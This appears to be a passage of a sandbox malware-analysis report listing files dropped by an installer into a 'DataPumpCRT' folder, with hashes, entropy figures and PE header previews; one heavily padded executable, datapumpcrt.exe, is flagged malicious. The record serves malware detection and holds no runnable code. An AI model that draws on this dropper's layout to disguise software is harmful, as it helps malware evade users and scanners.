MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-4GFMI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-CUH2H.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	273342460
Entropy (8bit):	0.2152224945289245
Encrypted:	false
SSDEEP:	49152:KAR60WIcEalOOAZLOh61ZDeT79qwg0lXO8zVOSIhnUuh7KWQovuZ/T7En:K8cfl4r1ZeVbYWwSPu7KWQovuZ/T7
MD5:	A8F6256F7E6C68B81633AE38A46013CE
SHA1:	03CC6C49AA11D50650E7B2090820FCBE87A00AE8
SHA-256:	DBB04015141D2CBCDDD8A984FC2340F5E537D05DB87A3A8112C5E623221C787F
SHA-512:	38D5D35E6669B87D4E5644E62385629BED8444A5BBEDB5D2E941FAD689BC9DA28640DF6DF8E285421B581A3DAAC38B80CC3F47A6271C64AF7B2DB67A3BCB5161
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..#m..pm..pm..p..po..p..pn..p..pg..p..pf..p..po..pm..p...p..py..pm..pk..p..p@..p[.pl..p...pl..pRichm..p................PE..L....".e..................%.........&2$.......%...@..........................0K...............................................+.......2.8.............................................................................%.\............................text.....%.......%................. ..`.rdata...M....%..P....%.............@..@.data...DZ... +...... +.............@....rsrc...8.....2......02.............@..@.flang........;......@;.............`...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\is-6OKP8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	data
Category:	dropped
Size (bytes):	273342460
Entropy (8bit):	0.21522249515446643
Encrypted:	false
SSDEEP:
MD5:	283272AEB1EBB5E66F986E7045E1F29C
SHA1:	EA661C684429BFC89BEDF9941AFE1851168CFB9C
SHA-256:	5EDD559F60CE070CA6D3A5B766238A49EB99EE02B07CED0141B8AA5DB9FFD560
SHA-512:	3EF692D627FAF41588111B36799466C59B79E170558C8FBEA131EE5EF3D5A19BD10517C971A08DDD23C3DA4E4279F087EF11C230DF1A04CD844DF85E0D4DF0E7
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..#m..pm..pm..p..po..p..pn..p..pg..p..pf..p..po..pm..p...p..py..pm..pk..p..p@..p[.pl..p...pl..pRichm..p................PE..L....".e..................%.........&2$.......%...@..........................0K...............................................+.......2.8.............................................................................%.\............................text.....%.......%................. ..`.rdata...M....%..P....%.............@..@.data...DZ... +...... +.............@....rsrc...8.....2......02.............@..@.flang........;......@;.............`...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\is-V9NBJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	715038
Entropy (8bit):	6.505047376817153
Encrypted:	false
SSDEEP:
MD5:	BFA161AB7F837D65C7405ACA3AAFC240
SHA1:	6B1D618EF801B6135BF193A49F8749D0864CC390
SHA-256:	D2960019D9F83C67726BF9FDB864BDF24A57F9B66A7C4E3AEE77617D73EC883E
SHA-512:	9B33EBA0A642BB3EE9A8851E520D2CE281FA31015AAC2647584A7B2AB26837C65ADF1B031B81D557602545D46EF3F33FA1D5BE64809F25453F48BBA06ECEDB2D
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\stuff\date.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\is-2KD87.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\stuff\is-3U0TF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
